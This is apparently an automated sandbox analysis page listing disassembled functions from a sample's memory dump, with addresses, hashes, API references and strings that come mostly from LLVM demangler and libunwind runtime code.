Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmallocmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$_$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 2036919697-1558868925
Opcode ID: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction ID: b81ca4b2df554dacf10d133109412c26e0b3a1fa1b67f799bd7b5705f432bc6a
Opcode Fuzzy Hash: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction Fuzzy Hash: AD61646363A74782EAA1EF19A8401AAA7B5FB487C0F840535DB8E47751EF3CE545C390

Function 00007FF779706D70 Relevance: 16.8, APIs: 11, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF779706DA1
realloc.MSVCRT ref: 00007FF779706E7B
realloc.MSVCRT ref: 00007FF779706ED5
memcpy.MSVCRT ref: 00007FF779706EF3
realloc.MSVCRT ref: 00007FF779706F2E
realloc.MSVCRT ref: 00007FF779706F8D
realloc.MSVCRT ref: 00007FF779706FE9
realloc.MSVCRT ref: 00007FF77970703E
memcpy.MSVCRT ref: 00007FF77970705B
realloc.MSVCRT ref: 00007FF7797070A2
memcpy.MSVCRT ref: 00007FF7797070BC

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy$malloc
String ID:
API String ID: 774493741-0
Opcode ID: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction ID: 74c7e4cd8e5cd78c1b181223cc730da686dbc0b8f9b5b534a1c41c305dd0fa1a
Opcode Fuzzy Hash: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction Fuzzy Hash: 1CA172B3A26B8682EE65DF55E8542A9A3B1FB58BC0F448531CF8D07791EF3CE4518350

Function 00007FF779709150 Relevance: 16.7, APIs: 11, Instructions: 246COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779709198
realloc.MSVCRT ref: 00007FF779709220
realloc.MSVCRT ref: 00007FF779709279
memcpy.MSVCRT ref: 00007FF779709297
realloc.MSVCRT ref: 00007FF7797092CF
realloc.MSVCRT ref: 00007FF77970931B
realloc.MSVCRT ref: 00007FF779709380
realloc.MSVCRT ref: 00007FF7797093D9
memcpy.MSVCRT ref: 00007FF7797093F7
realloc.MSVCRT ref: 00007FF77970942F
realloc.MSVCRT ref: 00007FF7797094A2

Part of subcall function 00007FF779704F60: realloc.MSVCRT ref: 00007FF779704FED
Part of subcall function 00007FF779704F60: realloc.MSVCRT ref: 00007FF77970506D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction ID: 0706b0827f711480bb8eb11e25989e3152a89ca288c82d5c32e546690f5d92d1
Opcode Fuzzy Hash: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction Fuzzy Hash: ADA160B3A26B4283DA699F46F85036AF3B1EB58BC0F448431DB9E07791EF3CE4418250

Function 00007FF7796F7780 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

., xrefs: 00007FF7796F78F4

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction ID: e5e24bbd2ee0d77cceae111707875eb7f55679b4e4d1c3ca0307b916a1c13aaa
Opcode Fuzzy Hash: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction Fuzzy Hash: 98024273A3A64387E774AE16E05067BB7B3EB54740F805235EB9E86B81EB2CE541C710

Function 00007FF7797121E0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00007FF779712439

Strings

., xrefs: 00007FF779712354

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputc
String ID: .
API String ID: 1992160199-248832578
Opcode ID: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction ID: 85c9dda549c302b4c08648edc51253f6bfbeb58257e74dd5c440d748489fa5a2
Opcode Fuzzy Hash: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction Fuzzy Hash: C1F15233A7A243C7F774AE15E09073EB7B1EB98780F844535CB9A46A85DB2CE841C764

Function 00007FF7796FCEA0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF7796FCFA9

Strings

string literal, xrefs: 00007FF7796FD033
struct, xrefs: 00007FF7796FCEA2

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: string literal$struct
API String ID: 471065373-3644149429
Opcode ID: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction ID: 7ec4ce17356bb61edc6888e0ccbfdce2d1aa383f3e396a8a20f1f919a1b8a665
Opcode Fuzzy Hash: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction Fuzzy Hash: 82D18273A3BB4345EA65AF15A4502BAE6A3AF54780F844631CB9D87781EF3CF452C321

Function 00007FF779701129 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7797011E6
memcpy.MSVCRT ref: 00007FF779701207

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocmemcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 4276657696-3503049562
Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction ID: 901c0c33fc201d1bc152601ab319639667915a3c278122868caeaf20f5600784
Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction Fuzzy Hash: 4E71656362AB4782EA65EF19E8402AAA3B1FB497C0F844435DB8D07B55EF3CE545C390

Function 00007FF7796F62B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7796F6377
fputwc.MSVCRT ref: 00007FF7796F63E3
fwprintf.MSVCRT ref: 00007FF7796F64AD
fwprintf.MSVCRT ref: 00007FF7796F64C7

Strings

%.*S, xrefs: 00007FF7796F64A0
%*.*S, xrefs: 00007FF7796F6303
%-*.*S, xrefs: 00007FF7796F64BD

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fwprintf$fputwcstrlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 3854221471-2115465065
Opcode ID: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction ID: 58dbff9d8c97d0c63dca380c044d6024d53abb5806114f832e45120f167f1f23
Opcode Fuzzy Hash: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction Fuzzy Hash: 18514473A39A0B87E774AE16E05067BF2B3EB44750F809235DB5EC7691EA3CE8418710

Function 00007FF7796F4810 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF7796F484A
abort.MSVCRT ref: 00007FF7796F484F
fflush.MSVCRT ref: 00007FF7796F489A
abort.MSVCRT ref: 00007FF7796F489F
RtlVirtualUnwind.KERNEL32 ref: 00007FF7796F4904

Strings

libunwind: %s - %s, xrefs: 00007FF7796F4823, 00007FF7796F4873
setFloatReg, xrefs: 00007FF7796F487A
float registers unimplemented, xrefs: 00007FF7796F4831, 00007FF7796F4881
getFloatReg, xrefs: 00007FF7796F482A

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: abortfflush$UnwindVirtual
String ID: float registers unimplemented$getFloatReg$libunwind: %s - %s$setFloatReg
API String ID: 3704712045-981669299
Opcode ID: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction ID: b6a9875834cdc778c4d49efd3a05f334163e42ac6fd873125b17e2cea930a108
Opcode Fuzzy Hash: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction Fuzzy Hash: 2031A462A3AB5782E714BF65F8443E9A376EB88BC4F804436DA4E43751DE3CD546C350

Function 00007FF7796F60C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF7796F6195
fwprintf.MSVCRT ref: 00007FF7796F6277

Strings

%s , xrefs: 00007FF7796F60C1, 00007FF7796F60C2
%.*s, xrefs: 00007FF7796F6250
%*.*s, xrefs: 00007FF7796F610D
%-*.*s, xrefs: 00007FF7796F626D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputwcfwprintf
String ID: %*.*s$%-*.*s$%.*s$%s
API String ID: 3232229890-407542676
Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction ID: aea806afaa2742f8bc7da8de5b9bfbfe9da906a12e30e7ab4215072fd41e473d
Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction Fuzzy Hash: 5A514573A39A0787EB749E1AE45063FB3B3EB44750B504235DB5EC7691EE2CE8419B10

Function 00007FF7797080F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF779708153
realloc.MSVCRT ref: 00007FF7797081A9
realloc.MSVCRT ref: 00007FF77970820D
memcpy.MSVCRT ref: 00007FF779708227
realloc.MSVCRT ref: 00007FF77970825F

Strings

Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF77970813F
'unnamed, xrefs: 00007FF7797081BE
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779708146

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$_assertmemcpy
String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
API String ID: 2140428464-3850676658
Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction ID: a16fd73535feca80400fbc4539ad69b40206e6fe2fec9cd19beda73bdf512496
Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction Fuzzy Hash: 024162B3A27F4382DE68DF46E8442A9A371EB58BC4F948535CB9D07791EF2CD4818350

Function 00007FF7796FD9A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7796FDA1E
malloc.MSVCRT ref: 00007FF7796FDA57
memcpy.MSVCRT ref: 00007FF7796FDA9B
_assert.MSVCRT ref: 00007FF7796FDAF8
_assert.MSVCRT ref: 00007FF7796FDB12

Strings

FromPosition <= Names.size(), xrefs: 00007FF7796FDAE4
Index <= size() && "dropBack() can't expand!", xrefs: 00007FF7796FDAFE
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF7796FDAEB, 00007FF7796FDB05

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmalloc$memcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$FromPosition <= Names.size()$Index <= size() && "dropBack() can't expand!"
API String ID: 4247363904-2992651634
Opcode ID: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction ID: f8f48023ed7aeed525f0bf44951468d42ac122d69e30e3487e105903f10bcc7e
Opcode Fuzzy Hash: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction Fuzzy Hash: 0C418F6373AA0281EA24AF05E8447AAA376FB487C4F894536EE4C47751EF7CE485C364

Function 00007FF7796F3F50 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF7796F3F8F

Part of subcall function 00007FF7796F4120: fflush.MSVCRT ref: 00007FF7796F422D
Part of subcall function 00007FF7796F4120: fflush.MSVCRT ref: 00007FF7796F4287

RtlUnwindEx.KERNEL32 ref: 00007FF7796F40A6
fflush.MSVCRT ref: 00007FF7796F4106
abort.MSVCRT ref: 00007FF7796F410B

Strings

libunwind: %s - %s, xrefs: 00007FF7796F40DF
libunwind: _Unwind_Resume(ex_obj=%p), xrefs: 00007FF7796F3F73
_Unwind_Resume() can't return, xrefs: 00007FF7796F40ED
_Unwind_Resume, xrefs: 00007FF7796F40E6

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$Unwindabort
String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
API String ID: 3252057912-3900785416
Opcode ID: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction ID: 65a8cdbebb9922243a4e9292bc1a29639f1b38ba277f5fa9ede8d7b35f4d77ee
Opcode Fuzzy Hash: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction Fuzzy Hash: 04417022C2DBC282F635AF04A4057FAA375FFD9784F405226EA8802655EF7DD2D2C750

Function 00007FF7796F45B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF7796F46AC
abort.MSVCRT ref: 00007FF7796F46B1

Strings

unsupported register, xrefs: 00007FF7796F4693, 00007FF7796F47DA
libunwind: %s - %s, xrefs: 00007FF7796F4685, 00007FF7796F47CC
getReg, xrefs: 00007FF7796F468C
setReg, xrefs: 00007FF7796F47D3

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: abortfflush
String ID: getReg$libunwind: %s - %s$setReg$unsupported register
API String ID: 4129902348-1024193272
Opcode ID: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction ID: a1a653f87d046c5297d071573bbc96f24afa7e61c18140e781814775fa213b14
Opcode Fuzzy Hash: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction Fuzzy Hash: 92115452E7B91B92EA14BF50A9556F89737DFC97C1FC08836C50D03796AE3CA102C361

Function 00007FF779702797 Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 00007FF7797027B2
isxdigit.MSVCRT ref: 00007FF7797027C4
isxdigit.MSVCRT ref: 00007FF7797027D6
isxdigit.MSVCRT ref: 00007FF7797027E8
isxdigit.MSVCRT ref: 00007FF7797027FA
isxdigit.MSVCRT ref: 00007FF77970280C
isxdigit.MSVCRT ref: 00007FF77970281E
isxdigit.MSVCRT ref: 00007FF779702830
malloc.MSVCRT ref: 00007FF77970287D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction ID: 2d2e4778caa2a327f937103181b9733d72854b0770445b6f412da6957c308489
Opcode Fuzzy Hash: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
